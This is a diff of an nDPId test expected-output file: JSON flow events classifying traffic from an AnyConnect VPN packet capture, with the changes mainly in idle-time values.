-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} 